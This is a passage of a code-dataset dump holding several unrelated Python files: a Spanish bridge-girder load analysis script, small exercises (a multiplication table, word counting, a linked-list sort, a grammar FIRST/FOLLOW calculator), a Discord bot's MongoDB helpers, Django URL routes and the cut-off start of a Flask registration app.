regla_palanca['g_int_moment'] = max(g_int_moment_1, g_int_moment_2)\n\n factor_distribucion['reglaPalanca'] = regla_palanca\n\n factor_distribucion['g_int_moment'] = min(factor_distribucion['ecuacion']['g_int_moment'], factor_distribucion['reglaPalanca']['g_int_moment'])\n\n superestructura['factorDistribucion'] = factor_distribucion\n\ndef factor_distribucion_cortante_viga_interior(superestructura):\n factor_distribucion = {}\n\n Nb = superestructura['Nb']\n S = superestructura['S']\n\n # verificar la aplicabilidad de la ecuación\n check = {}\n check['Nb==3'] = Nb == 3\n factor_distribucion['check'] = check\n\n if check['Nb==3']:\n separacion_ruedas = camion_CC14['separacion_ruedas']\n separacion_borde = camion_CC14['separacion_borde']\n \n # un carril cargado\n m = factor_presencia_multiple[1]\n g_int_moment_1 = factor_distribucion['g_int_1'] = m * (2*S - separacion_ruedas) / (2*S)\n\n # dos carriles cargados\n m = factor_presencia_multiple[2]\n g_int_moment_2 = factor_distribucion['g_int_2'] = 2 * m * (2*S - 2*separacion_borde - separacion_ruedas) / (2*S)\n\n factor_distribucion['g_int'] = max(g_int_moment_1, g_int_moment_2)\n\n superestructura['factorDistribucionCortanteVigaInterior'] = factor_distribucion\n\ndef factor_distribucion_momento_viga_exterior(superestructura):\n # factor de distrubción de momento flector en la viga exterior\n factor_distribucion = {}\n\n Nb = superestructura['Nb']\n S = superestructura['S']\n S_overhang = superestructura['S_overhang']\n ancho_bordillo = superestructura['losa']['baranda']['bordillo']['ancho']\n d_e = factor_distribucion['d_e'] = S_overhang - ancho_bordillo\n\n # verificar la aplicabilidad de la ecuación\n check = {}\n\n check['Nb==3'] = Nb == 3\n check['-0.3<=de<=1.7'] = -0.3 <= d_e <= 1.7\n\n factor_distribucion['check'] = check\n\n separacion_ruedas = camion_CC14['separacion_ruedas']\n separacion_borde = camion_CC14['separacion_borde']\n\n if check['-0.3<=de<=1.7']:\n eq = {}\n\n # un carril cargado\n m = 
factor_presencia_multiple[1]\n mg_1 = eq['mg_1'] = m * (2*(ancho_bordillo + separacion_borde - S_overhang) + separacion_ruedas) / (2*S)\n\n # dos carriles cargados\n mg_int = superestructura['factorDistribucion']['g_int_moment']\n e = 0.77 + d_e/ 2.8\n mg_2 = eq['mg_2'] = e * mg_int \n\n factor_distribucion['e'] = e\n factor_distribucion['mg_int'] = mg_int\n eq['mg'] = max(mg_1, mg_2)\n\n\n factor_distribucion['ecuacion'] = eq\n\n if check['Nb==3']:\n # regla de la palanca\n regla_palanca = {}\n\n # un carril cargado\n mg_ext_momento_1 = regla_palanca['mg_Me_1C'] = mg_1\n\n # dos carriles cargados\n m = factor_presencia_multiple[2]\n mg_ext_momento_2 = regla_palanca['mg_Me_2C'] = 2 * m * (3 * (S_overhang + S) - 4*separacion_borde - 3*ancho_bordillo - 2*separacion_ruedas) / (2*S)\n\n regla_palanca['mg_Me'] = max(mg_ext_momento_1, mg_ext_momento_2)\n\n factor_distribucion['reglaPalanca'] = regla_palanca\n\n factor_distribucion['mg_Me'] = min(factor_distribucion['ecuacion']['mg'], factor_distribucion['reglaPalanca']['mg_Me'])\n\n superestructura['factorDistribucionMomentoVigasExteriores'] = factor_distribucion\n\ndef factor_distribucion_diseno(superestructura):\n factor_distribucion_viga_interior = superestructura['factorDistribucion']['g_int_moment']\n factor_distribucion_viga_exterior = superestructura['factorDistribucionMomentoVigasExteriores']['mg_Me']\n\n superestructura['factorDistribucionDiseno'] = max(factor_distribucion_viga_interior, factor_distribucion_viga_exterior)\n\ndef avaluo_carga(superestructura):\n #\n avaluo_carga = {}\n\n # carga muerta\n carga_muerta = avaluo_carga['cargaMuerta'] = {}\n # losa\n espesor_losa = superestructura['losa']['ts']\n peso_especifico = superestructura['losa']['γ']\n ancho_aferente = superestructura['S']\n \n losa = carga_muerta['losa'] = peso_especifico * espesor_losa * ancho_aferente\n # viga\n viga = carga_muerta['viga'] = superestructura['vigas']['peso']\n\n # personal y equipos\n personalEquipos = 
carga_muerta['personalEquipos'] = 0.75 # kN/m\n\n # total\n carga_muerta['total'] = losa + viga + personalEquipos\n\n # sobreimpuesta\n carga_sobreimpuesta = avaluo_carga['cargaSobreimpuesta'] = {}\n # carpeta asfaltica\n no_vigas = superestructura['Nb']\n peso_especifico = superestructura['carpetaAsfaltica']['γ']\n espesor = superestructura['carpetaAsfaltica']['e']\n ancho_losa = superestructura['losa']['ancho']\n ancho_bordillo = superestructura['losa']['baranda']['bordillo']['ancho']\n\n carpetaAsfaltica = carga_sobreimpuesta['carpetaAsfaltica'] = peso_especifico * espesor * (ancho_losa - 2 * ancho_bordillo) / no_vigas\n # bordillo + baranda\n peso_bordillo = superestructura['losa']['baranda']['bordillo']['peso']\n peso_baranda = superestructura['losa']['baranda']['peso']\n\n bordilloBaranda = carga_sobreimpuesta['bordilloBaranda'] = 2 * (peso_bordillo + peso_baranda) / no_vigas\n # \n\n\n # total\n # carga_sobreimpuesta['total'] = carpetaAsfaltica + bordilloBaranda\n\n superestructura['avaluoCarga'] = avaluo_carga\n\n return avaluo_carga\n\n\ndef create_model(superestructura):\n # pyFEM model\n L = superestructura['L']\n Ec = superestructura['Ec']\n Iz = superestructura['I']\n\n model = Structure(uy=True, rz=True)\n\n # add material\n model.add_material(1, E=Ec)\n\n # add section\n model.add_section(1, Iz=Iz)\n\n # add joints\n model.add_joint(1, x=0)\n model.add_joint(2, x=L)\n\n # add frame\n model.add_frame(1, 1, 2, 1, 1)\n\n # add supports\n model.add_support(1, uy=True)\n model.add_support(2, uy=True)\n\n model.set_flags_active_joint_displacements()\n model.set_indexes()\n model.set_stiffness_matrix_modified_by_supports()\n\n return model\n\ndef plot(x, y, name, title, ylabel, no_ticks=2, invert_yaxis=False):\n # loadPattern = model.load_patterns['MDC']\n # mz = model.internal_forces[loadPattern][frame].mz\n\n fig, ax = plt.subplots()\n\n ax.plot(x, y, 'r')\n ax.set_title(title) # 'Momento flector'\n ax.set_xlim(min(x), max(x))\n # ax.set_ylim(ymax=0)\n\n 
if invert_yaxis: ax.invert_yaxis()\n\n ax.set_xlabel('m')\n ax.set_ylabel(ylabel) # 'kN m'\n\n ax.set_xticks(x[::no_ticks])\n ax.set_yticks(list(set(np.round_(y[::no_ticks], 3))))\n ax.grid(True)\n\n fig.savefig(f'{name}.png')\n\ndef momentos_flectores_cargas_estructura(params, model):\n carga_estructura = params['DCest'] # superestructura['avaluoCarga']['cargaMuerta']['total']\n\n frame = model.frames[1]\n length = frame.get_length()\n loadPattern = model.add_load_pattern(\"cargaPermanenteest\")\n loadPattern.add_distributed_load(frame.name, fy=-carga_estructura)\n\n model.solve_load_pattern(loadPattern.name)\n\n mz = frame.get_internal_forces(loadPattern.name, 20)['mz'] # model.internal_forces[loadPattern.name][frame.name].mz\n x = np.linspace(0, length, len(mz))\n\n\n plot(x, mz, 'Mdnc', 'Momentos flectores', 'kN m')\n\n x = x[::2]\n mz = mz[::2]\n params['Mdnc'] = [[x, m] for x, m in zip(x, mz)]\n\ndef fuerzas_internas_cargas_permanentes(params, model):\n carga_permanente = params['DCper'] # superestructura['avaluoCarga']['cargaMuerta']['total']\n\n frame = model.frames[1]\n length = frame.get_length()\n loadPattern = model.add_load_pattern(\"cargaPermanente\")\n loadPattern.add_distributed_load(frame.name, fy=-carga_permanente)\n\n model.solve_load_pattern(loadPattern.name)\n\n fy = frame.get_internal_forces(loadPattern.name, 40)['fy']\n mz = frame.get_internal_forces(loadPattern.name, 40)['mz'] # model.internal_forces[loadPattern.name][frame.name].mz\n x = np.linspace(0, length, len(mz))\n\n plot(x, fy, 'VDC', 'Fuerza cortante', 'kN', no_ticks=4)\n plot(x, mz, 'MDC', 'Momentos flectores', 'kN m', invert_yaxis=True, no_ticks=4)\n\n x = x[::4]\n fy = fy[::4]\n mz = mz[::4]\n\n params['VDC'] = [[x, v] for x, v in zip(x, fy)]\n params['MDC'] = [[x, m] for x, m in zip(x, mz)]\n\n params['VDCmax'] = max(fy)\n\n return params\n\ndef momentos_flectores_carpeta_asfaltica(superestructura, model):\n carga_carpeta = 
superestructura['avaluoCarga']['cargaSobreimpuesta']['carpetaAsfaltica']\n\n frame = model.frames[1]\n length = frame.get_length()\n\n loadPattern = model.add_load_pattern('carpetaAsfaltica')\n loadPattern.add_distributed_load(frame, fy=-carga_carpeta)\n\n model.solve()\n\n mz = model.internal_forces[loadPattern][frame].mz\n n = len(mz)\n\n superestructura['momentosFlectoresCarpetaAsfaltica'] = [[i / (n - 1) * length, m] for i, m in enumerate(mz)]\n\n\ndef momentos_flectores_bordillos_barandas(superestructura, model):\n carga_bordillosBarandas = superestructura['avaluoCarga']['cargaSobreimpuesta']['bordilloBaranda']\n\n frame = model.frames[1]\n length = frame.get_length()\n\n loadPattern = model.add_load_pattern('cargaBordillosBarandas')\n loadPattern.add_distributed_load(frame, fy=-carga_bordillosBarandas)\n\n model.solve()\n\n mz = model.internal_forces[loadPattern][frame].mz\n n = len(mz)\n\n superestructura['momentosFlectoresBordillosBarandas'] = [[i / (n - 1) * length, m] for i, m in enumerate(mz)]\n\n\ndef momentos_flectores_carga_viva_vehicular(params, model):\n # viga\n frame = model.frames[1]\n length = frame.get_length()\n\n # camion\n x_ejes_camion = np.array([0] + camion_CC14['separacion_ejes'])\n for i in range(len(x_ejes_camion)):\n for j in range(i+1, len(x_ejes_camion)):\n x_ejes_camion[j] += x_ejes_camion[i]\n length_camion = x_ejes_camion[-1]\n peso_ejes_camion = camion_CC14['peso_ejes']\n \n # tandem\n x_ejes_tandem = np.array([0] + tandem_CC14['separacion_ejes'])\n for i in range(len(x_ejes_tandem)):\n for j in range(i+1, len(x_ejes_tandem)):\n x_ejes_tandem[j] += x_ejes_tandem[i]\n \n length_tandem = x_ejes_tandem[-1]\n peso_ejes_tandem = tandem_CC14['peso_ejes']\n\n # casos de carga\n casos_carga_camion_CC14 = []\n n = 401 # NUMERO PARADAS CAMION\n vehiculos = ['camion', 'tandem']\n length_vehiculos = [length_camion, length_tandem]\n x_ejes_vehiculos = [x_ejes_camion, x_ejes_tandem]\n peso_ejes_vehiculos = [peso_ejes_camion, 
peso_ejes_tandem]\n\n for vehiculo, length_vehiculo, x_ejes, peso_ejes in zip(vehiculos, length_vehiculos, x_ejes_vehiculos, peso_ejes_vehiculos):\n for i in range(n):\n x = (i / (n - 1)) * (length + length_vehiculo)\n\n loadPattern = model.add_load_pattern(f'{vehiculo}: {x:.3f} m')\n\n for j, xi in enumerate(x - x_ejes):\n if 0 < xi < length:\n loadPattern.add_point_load_at_frame(frame.name, fy=(-peso_ejes[j], xi / length))\n\n casos_carga_camion_CC14.append(loadPattern.name)\n\n x = (n - 1 - i) / (n - 1) * (length + length_vehiculo) - length_vehiculo\n\n loadPattern = model.add_load_pattern(f'{vehiculo}: -{x:.3f} m')\n\n for j, xi in enumerate(x + x_ejes):\n if 0 < xi < length:\n loadPattern.add_point_load_at_frame(frame.name, fy=(-peso_ejes[j], xi / length))\n\n casos_carga_camion_CC14.append(loadPattern.name)\n\n # carril\n w = -camion_CC14['carga_carril']\n loadPattern = model.add_load_pattern('carril')\n loadPattern.add_distributed_load(frame.name, fy=w)\n\n model.solve()\n\n n = 401 # cantidad de valores por elemento por defecto\n cortantes = {'{:.3f}'.format(i / (n - 1) * length): [] for i in range(n)}\n momentos = {'{:.3f}'.format(i / (n - 1) * length): [] for i in range(n)}\n\n for load_pattern in casos_carga_camion_CC14:\n fy = frame.get_internal_forces(load_pattern, n-1)['fy']\n mz = frame.get_internal_forces(load_pattern, n-1)['mz']\n\n for i in range(n):\n cortantes['{:.3f}'.format(i / (n - 1) * length)].append(fy[i])\n momentos['{:.3f}'.format(i / (n - 1) * length)].append(mz[i])\n\n cortantes_maximos = []\n cortantes_minimos = []\n \n momentos_maximos = []\n for i, (v, m) in enumerate(zip(cortantes.values(), momentos.values())):\n cortantes_maximos.append([i / (n - 1) * length, max(v)])\n cortantes_minimos.append([i / (n - 1) * length, min(v)])\n momentos_maximos.append([i / (n - 1) * length, max(m)])\n\n loadPattern = model.load_patterns['carril']\n cortantes_carril = [[(i / (n - 1)) * length, v] for i, v in 
enumerate(frame.get_internal_forces(loadPattern.name, n-1)['fy'])]\n momentos_carril = [[(i / (n - 1)) * length, m] for i, m in enumerate(frame.get_internal_forces(loadPattern.name, n-1)['mz'])]\n\n cortantes_max_carga_vehicular = []\n cortantes_min_carga_vehicular = []\n momentos_carga_vehicular = []\n # factor_distribucion = params['factorDistribucionDiseno']\n for i, (v_min_camion, v_max_camion, v_carril, m_camion, m_carril) in enumerate(zip(cortantes_minimos, cortantes_maximos, cortantes_carril, momentos_maximos, momentos_carril)):\n x = m_camion[0]\n cortantes_max_carga_vehicular.append([x, 1.33 * v_max_camion[1] + v_carril[1]])\n cortantes_min_carga_vehicular.append([x, 1.33 * v_min_camion[1] + v_carril[1]])\n momentos_carga_vehicular.append([x, 1.33 * m_camion[1] + m_carril[1]]) # factor_distribucion * ()\n\n plot([x_m[0] for x_m in momentos_carga_vehicular], [x_m[1] for x_m in momentos_carga_vehicular], 'MLL', 'Momentos flectores', 'kN m', 40, True)\n\n plot([x_v[0] for x_v in cortantes_max_carga_vehicular], [x_v[1] for x_v in cortantes_max_carga_vehicular], 'VLL', 'Fuerza cortante', 'kN', 80)\n\n plot([x_v[0] for x_v in cortantes_min_carga_vehicular], [x_v[1] for x_v in cortantes_min_carga_vehicular], 'VLLmin', 'Fuerza cortante', 'kN', 80)\n \n params['MLV'] = momentos_maximos[::40]\n params['MLC'] = momentos_carril[::40]\n params['MLL'] = momentos_carga_vehicular[::40]\n\n params['VLV'] = cortantes_maximos[::40]\n params['VLC'] = cortantes_carril[::40]\n params['VLL_max'] = cortantes_max_carga_vehicular[::40]\n params['VLL_min'] = cortantes_min_carga_vehicular[::40]\n\n params['MLVmax'] = max([m[1] for m in momentos_maximos])\n params['MLCmax'] = max([m[1] for m in momentos_carril])\n params['MLLmax'] = max([m[1] for m in momentos_carga_vehicular])\n\n params['VLVmax'] = max([v[1] for v in cortantes_maximos])\n params['VLCmax'] = max([v[1] for v in cortantes_carril])\n params['VLLmax'] = max([v[1] for v in cortantes_max_carga_vehicular])\n\n return 
params\n \n\ndef combinaciones_carga(params, model):\n params['combinacionesCarga'] = {}\n\n length = params['L']\n n = 11\n\n m_carga_permanente = params['MDC']\n m_carga_vehicular = params['MLL']\n cargas = [m_carga_permanente, m_carga_vehicular]\n fd1 = params['mg1i']\n fd2 = params['mg2i']\n fd3 = params['mg1e']\n fd4 = params['mg2e']\n\n # estado límite de resistencia última\n mu = []\n for i, (carga_permanente, carga_vehicular) in enumerate(zip(*cargas)):\n mu.append([(i / (n - 1) * length), 1.25 * carga_permanente[1] + max(fd1,fd3) * 1.75 * carga_vehicular[1]])\n\n params['combinacionesCarga']['resistenciaUltima'] = mu\n\n # del mu\n\n # estado límite de resistencia IV\n # mu = []\n # for x, m in m_carga_permanente:\n # mu.append([x, 1.5 * m])\n\n # superestructura['combinacionesCarga']['resistenciaIV'] = mu\n\n # estado límite servicio\n mu = []\n for i, (carga_permanente, carga_vehicular) in enumerate(zip(*cargas)):\n mu.append([(i / (n - 1) * length), 1 * carga_permanente[1] + max(fd1, fd3) * 1 * carga_vehicular[1]])\n\n params['combinacionesCarga']['servicio'] = mu\n \n # print(mu)\n\ndef combinaciones_cargav(params, model):\n params['combinacionesCargav'] = {}\n\n length = params['L']\n n = 11\n\n m_carga_permanentev = params['VDC']\n m_carga_vehicularv = params['VLL_max']\n cargasv = [m_carga_permanentev, m_carga_vehicularv]\n fd1 = params['mg1i']\n fd3 = params['mg1e']\n\n #print(m_carga_permanentev)\n #print(m_carga_vehicularv)\n\n # estado límite de resistencia última\n vu = []\n for i, (carga_permanentev, carga_vehicularv) in enumerate(zip(*cargasv)):\n vu.append([(i / (n - 1) * length), 1.25 * carga_permanentev[1] + max(fd1, fd3) * 1.75 * carga_vehicularv[1]])\n\n params['combinacionesCargav']['resistenciaUltimav'] = vu\n\n # estado límite de resistencia IV\n # vu = []\n # for x, m in m_carga_permanentev:\n # vu.append([x, 1.5 * m])\n\n # superestructura['combinacionesCarga']['resistenciaIV'] = vu\n\n # estado límite servicio\n vu = []\n for i, 
(carga_permanentev, carga_vehicularv) in enumerate(zip(*cargasv)):\n vu.append([(i / (n - 1) * length), 1 * carga_permanentev[1] + max(fd1, fd3) * 1 * carga_vehicularv[1]])\n\n params['combinacionesCargav']['servicio'] = vu\n \n #print(mu) \n\nif __name__ == '__main__':\n superestructura = superestructura()\n # pp.pprint(superestructura)\n\n # doc template\n doc = DocxTemplate('template.docx')\n doc.render(superestructura)\n doc.save('output.docx')\n print('todo ok')\n","repo_name":"rvcristiand/pyLLDFs","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":36790,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"43684263771","text":"print('=§='*13)\nwhile True:\n n = int(input('Digite um número para ver sua tábuada.'))\n if n < 0:\n break\n for c in range(1, 11):\n print(f'{n} x {c:^2} = {n * c}')\n c += 1\n print('=§='*13)\nprint('Fim do programa')\n","repo_name":"DonovanTarsis/Aprendizagem-Python","sub_path":"PythonExercicios/ex067.py","file_name":"ex067.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"71269876574","text":"#!/usr/bin/env python3\n\nimport jinja2\nfrom datetime import datetime\nimport metalmaps\nfrom mapcollection import mapCollection\n\n\nversion = metalmaps.__version__\ndate = datetime.today().strftime(\"%Y-%m-%d\")\n\n\nif __name__ == \"__main__\":\n\n env = jinja2.Environment(loader=jinja2.FileSystemLoader(\".\"))\n template = env.get_template(\"./metalmaps.html.jinja\")\n\n print(\n template.render(\n cmaps=mapCollection,\n suffixes=[\"\", \"_r\"],\n version=version,\n date=date,\n )\n )\n","repo_name":"mladenivkovic/mladenivkovic.github.io","sub_path":"metalmaps/generate_html.py","file_name":"generate_html.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} 
+{"seq_id":"31679767632","text":"import re\r\nimport sys\r\nimport nltk\r\nimport os\r\nfrom collections import Counter\r\nimport pprint\r\n\r\nreload(sys)\r\nsys.setdefaultencoding('utf8')\r\n\r\ndef word_count(filename, lemmatized = False):\r\n try:\r\n file = open(filename, \"rb\")\r\n text = file.read()\r\n file.close()\r\n except:\r\n return \r\n\r\n # Ignore hypen or apostrophe? What if apostrophe used as quotation marks?\r\n word_array = re.split('[^\\w\\-\\']', text.lower())\r\n\r\n if lemmatized:\r\n lemma = nltk.wordnet.WordNetLemmatizer()\r\n word_array = [lemma.lemmatize(a, pos = 'v') if lemma.lemmatize(a, pos = 'v') != a else lemma.lemmatize(a) for a in word_array]\r\n\r\n # Is this efficient?\r\n word_dict = {a: word_array.count(a) for a in word_array if a not in ['', '-','\\'']}\r\n\r\n return word_dict\r\n\r\ndef parseTXT(file_name):\r\n if not os.path.exists(file_name): return \"File not found.\"\r\n txt_str = open(file_name, 'r').read()\r\n clean_txt = re.sub(r'[^\\w\\'\\-]',' ',txt_str).lower().split(' ')\r\n return {a:clean_txt.count(a) for a in set(clean_txt) - {''}}\r\n\r\ndef parseBIGtxt(file_name):\r\n if not os.path.exists(file_name): return \"File not found.\"\r\n result_dict = {}\r\n with open(file_name, 'r') as txt_file:\r\n for line in txt_file:\r\n clean_line = re.sub(r'[^\\w\\'\\-]',' ',line).lower().split(' ')\r\n for word in clean_line: \r\n if word in result_dict:\r\n result_dict[word] += 1\r\n else:\r\n result_dict[word] = 1\r\n del result_dict['']\r\n return result_dict\r\n\r\ndef read_file(file_name):\r\n open_file = open(file_name, 'r')\r\n word_list =[]\r\n contents = open_file.readlines()\r\n for i in range(len(contents)):\r\n word_list.extend(contents[i].split()) \r\n open_file.close()\r\n tuples_list = [(word, len(word)) for word in word_list]\r\n return tuples_list\r\n\r\npattern = re.compile(\"[^\\w'-]|_\")\r\nwith open(sys.argv[1], 'r') as content_file:\r\n content = content_file.read().strip().lower()\r\n 
stripped_content = pattern.sub(' ', content)\r\n arr = stripped_content.split()\r\n counter = Counter()\r\n for word in arr:\r\n counter[word] += 1\r\n\r\n pprint.pprint(counter)\r\n","repo_name":"elysia-oh/Exercises","sub_path":"WordCount.py","file_name":"WordCount.py","file_ext":"py","file_size_in_byte":2222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"20676943940","text":"# 给你链表的头结点 head ,请将其按 升序 排列并返回 排序后的链表 。 \n# \n# 进阶: \n# \n# \n# 你可以在 O(n log n) 时间复杂度和常数级空间复杂度下,对链表进行排序吗? \n# \n# \n# \n# \n# 示例 1: \n# \n# \n# 输入:head = [4,2,1,3]\n# 输出:[1,2,3,4]\n# \n# \n# 示例 2: \n# \n# \n# 输入:head = [-1,5,3,4,0]\n# 输出:[-1,0,3,4,5]\n# \n# \n# 示例 3: \n# \n# \n# 输入:head = []\n# 输出:[]\n# \n# \n# \n# \n# 提示: \n# \n# \n# 链表中节点的数目在范围 [0, 5 * 104] 内 \n# -105 <= Node.val <= 105 \n# \n# Related Topics 排序 链表\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\n\nclass Solution:\n def sortList(self, head: ListNode) -> ListNode:\n \"\"\"\n 归并排序 时间复杂度O(NlogN) 空间复杂度O(1)\n 分别两个间、四个间...比较,然后合并\n \"\"\"\n if not head or not head.next:\n return head\n cur, length = head, 0\n while cur:\n cur = cur.next\n length += 1\n # 哨兵结点\n sen = ListNode(0)\n sen.next = head\n # 每次合并的规模\n intv = 1\n while intv < length:\n merge_point, cur = sen, sen.next\n # 定位此次要合并的结点h1\n while cur:\n h1, intv_count = cur, intv\n # 判断h1长度是否足够此次合并,是否存在h2\n while intv_count and cur:\n cur = cur.next\n intv_count -= 1\n # 链表结束,没有h2\n if intv_count:\n break\n h2, intv_count = cur, intv\n while intv_count and cur:\n cur = cur.next\n intv_count -= 1\n # 计算h1长度,h2长度\n len1, len2 = intv, intv - intv_count\n # 合并\n while len1 and len2:\n if h1.val < h2.val:\n # merge_point是合并好的链表的最后一个结点\n # merge_point.next是新合并进来的结点\n merge_point.next = h1\n h1 = h1.next\n len1 -= 1\n else:\n merge_point.next = h2\n h2 = h2.next\n 
len2 -= 1\n merge_point = merge_point.next\n # 如果一个已排好,另一个有剩余,剩下的都是大的,直接加在末尾\n if len1:\n merge_point.next = h1\n else:\n merge_point.next = h2\n # 为下一次合并做准备,将merge_point移到本次合并链表的末尾\n while len1 > 0 or len2 > 0:\n merge_point = merge_point.next\n len1 -= 1\n len2 -= 1\n merge_point.next = cur\n # 合并规模增大一倍\n intv *= 2\n return sen.next\n# leetcode submit region end(Prohibit modification and deletion)\n","repo_name":"TianhengZhao/LeetCode","sub_path":"[148]排序链表.py","file_name":"[148]排序链表.py","file_ext":"py","file_size_in_byte":3294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"14640522072","text":"import pymongo\nimport config\n\ndb_uri = config.get(\"DB_URI\")\nclient = pymongo.MongoClient(db_uri)\n\n\ndef set_voice_channel(guild_id: int, voice_channel_id: int):\n db = client[\"discord\"]\n collection = db[\"channels\"]\n collection.update_one({\"guild_id\": guild_id},\n {\"$set\": {\"voice_channel_id\": voice_channel_id}},\n upsert=True)\n\n\ndef set_message_channel(guild_id: int, message_channel_id: int):\n db = client[\"discord\"]\n collection = db[\"channels\"]\n collection.update_one({\"guild_id\": guild_id},\n {\"$set\": {\"message_channel_id\": message_channel_id}},\n upsert=True)\n\n\ndef get_channels(guild_id: int):\n db = client[\"discord\"]\n collection = db[\"channels\"]\n return collection.find_one({\"guild_id\": guild_id, \"voice_channel_id\": {\"$ne\": 0}, \"message_channel_id\": {\"$ne\": 0}})\n\n\ndef set_time_delta(guild_id: int, time_delta: int):\n db = client[\"discord\"]\n collection = db[\"time_delta\"]\n collection.update_one({\"guild_id\": guild_id},\n {\"$set\": {\"time_delta\": int(time_delta)}},\n upsert=True)\n\n\ndef get_time_delta(guild_id: int):\n db = client[\"discord\"]\n collection = db[\"time_delta\"]\n return (collection.find_one({\"guild_id\": 
guild_id}))[\"time_delta\"]\n","repo_name":"ThatSongKim/check-io-discord-bot","sub_path":"server_info.py","file_name":"server_info.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"35344561680","text":"import sys\nsys.setrecursionlimit(60)\ntable = [[\"0\", \"\", \"3\", \"\", \"6\"], [\"\", \"1\", \"\", \"5\", \"\"], [\"\", \"\", \"\",\n \"4\", \"\"], [\"0\", \"\", \"3\", \"\", \"7\"], [\"\", \"2\", \"\", \"5\", \"\"], [\"\", \"2\", ]]\n\n\ndef first(string):\n first_ = set()\n if string in non_terminals:\n alternatives = productions_dict[string]\n\n for alternative in alternatives:\n first_2 = first(alternative)\n first_ = first_ | first_2\n\n elif string in terminals:\n first_ = {string}\n\n elif string == '' or string == '@':\n first_ = {'@'}\n\n else:\n first_2 = first(string[0])\n if '@' in first_2:\n i = 1\n while '@' in first_2:\n #print(\"inside while\")\n\n first_ = first_ | (first_2 - {'@'})\n #print('string[i:]=', string[i:])\n if string[i:] in terminals:\n first_ = first_ | {string[i:]}\n break\n elif string[i:] == '':\n first_ = first_ | {'@'}\n break\n first_2 = first(string[i:])\n first_ = first_ | first_2 - {'@'}\n i += 1\n else:\n first_ = first_ | first_2\n\n #print(\"returning for first({})\".format(string),first_)\n return first_\n\n\ndef follow(nT):\n #print(\"inside follow({})\".format(nT))\n follow_ = set()\n #print(\"FOLLOW\", FOLLOW)\n prods = productions_dict.items()\n if nT == starting_symbol:\n follow_ = follow_ | {'$'}\n for nt, rhs in prods:\n #print(\"nt to rhs\", nt,rhs)\n for alt in rhs:\n for char in alt:\n if char == nT:\n following_str = alt[alt.index(char) + 1:]\n if following_str == '':\n if nt == nT:\n continue\n else:\n follow_ = follow_ | follow(nt)\n else:\n follow_2 = first(following_str)\n if '@' in follow_2:\n follow_ = follow_ | follow_2-{'@'}\n follow_ = follow_ | follow(nt)\n else:\n follow_ = follow_ | follow_2\n 
#print(\"returning for follow({})\".format(nT),follow_)\n return follow_\n\n\nterminals = [\"id\", \"+\", \"*\", \"(\", \")\", \"$\"]\nnon_terminals = [\"E\", \"P\", \"T\", \"G\", \"F\"]\n\nstarting_symbol = \"$\"\nproductions = [\"E->TP\", \"P->+TP\", \"P->?\",\n \"T->FG\", \"G->*FG\", \"G->?\", \"F->id\", \"F->(E)\"]\n\nproductions_dict = {}\n\nfor nT in non_terminals:\n productions_dict[nT] = []\n\nfor production in productions:\n nonterm_to_prod = production.split(\"->\")\n alternatives = nonterm_to_prod[1].split(\"/\")\n for alternative in alternatives:\n productions_dict[nonterm_to_prod[0]].append(alternative)\n\nFIRST = {}\nFOLLOW = {}\n\nfor non_terminal in non_terminals:\n FIRST[non_terminal] = set()\n\nfor non_terminal in non_terminals:\n FOLLOW[non_terminal] = set()\n\n# print(\"FIRST\",FIRST)\n\nfor non_terminal in non_terminals:\n FIRST[non_terminal] = FIRST[non_terminal] | first(non_terminal)\n\n# print(\"FIRST\",FIRST)\n\n\nFOLLOW[starting_symbol] = FOLLOW[starting_symbol] | {'$'}\nfor non_terminal in non_terminals:\n FOLLOW[non_terminal] = FOLLOW[non_terminal] | follow(non_terminal)\n\n#print(\"FOLLOW\", FOLLOW)\n\nprint(\"{: ^20}{: ^20}{: ^20}\".format('Non Terminals', 'First', 'Follow'))\nfor non_terminal in non_terminals:\n print(\"{: ^20}{: ^20}{: ^20}\".format(non_terminal, str(\n FIRST[non_terminal]), str(FOLLOW[non_terminal])))\n","repo_name":"Furqan558/Compiler-Construction-with-python","sub_path":"(task 6a + 6b) CFG and LL1 Parser/cfg.py","file_name":"cfg.py","file_ext":"py","file_size_in_byte":3638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"13226996921","text":"from django.urls import path\n\nfrom store_project.tracking import views\n\n\napp_name = \"tracking\"\nurlpatterns = [\n path(\"\", views.test_list, name=\"test_list\"),\n path(\"/\", views.test_detail, name=\"test_detail\"),\n path(\n \"/results/add/\",\n views.test_result_create,\n name=\"test_result_create\"\n 
),\n path(\n \"/results/bulk/\",\n views.test_result_bulk,\n name=\"test_result_bulk\",\n ),\n path(\n \"/result-create-form/\",\n views.result_create_form,\n name=\"result_create_form\",\n ),\n]\n","repo_name":"adamchainz/fitness-store","sub_path":"app/store_project/tracking/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"33"} +{"seq_id":"3309324686","text":"from flask import Flask, render_template, request, jsonify\nfrom pymysql import connections\nimport os\nimport boto3\nfrom config import *\n\napp = Flask(__name__)\n\nbucket = custombucket\nregion = customregion\n\ndb_conn = connections.Connection(\n host=customhost,\n port=3306,\n user=customuser,\n password=custompass,\n db=customdb\n\n)\noutput = {}\ntable = 'employee'\n\n\n@app.route(\"/\", methods=['GET', 'POST'])\ndef home():\n return render_template('registration.html')\n\n\n\n# register page - sign up button\n@app.route(\"/registraion\", methods=['POST'])\ndef AddEmp():\n emp_id = request.form['emp_id']\n emp_name = request.form['emp_name']\n emp_email = request.form['emp_email']\n emp_bod = request.form['emp_bod']\n emp_bio = request.form['emp_bio']\n emp_job = request.form['emp_job']\n emp_interest = request.form['emp_interest']\n 